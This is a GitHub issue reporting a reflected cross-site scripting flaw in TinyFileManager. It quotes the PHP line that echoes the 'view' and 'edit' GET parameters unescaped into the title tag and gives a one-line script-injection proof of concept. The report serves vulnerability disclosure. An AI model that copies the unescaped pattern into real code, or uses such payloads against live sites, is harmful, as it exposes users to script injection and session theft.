Reflected XSS Vulnerability in tinyfilemanager.php

## Summary
A **reflected cross-site scripting (XSS)** vulnerability exists in TinyFileManager.  
User-supplied GET parameters (`view` and `edit`) are not properly sanitized when rendered in the HTML `<title>` tag.

## Affected Component
- File: `tinyfilemanager.php`
- Line: 3990


php
<title><?php echo fm_enc(APP_TITLE) ?> | <?php echo (isset($_GET['view']) ? $_GET['view'] : ((isset($_GET['edit']) ? $_GET['edit'] : "H3K"))); ?></title>


Proof of Concept (PoC)
GET /tinyfilemanager.php?view="><script>alert('XSS')</script>

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

Reflected XSS Vulnerability in tinyfilemanager.php #1341

Summary

Affected Component

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Uh oh!

Reflected XSS Vulnerability in tinyfilemanager.php #1341

Description

Summary

Affected Component

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions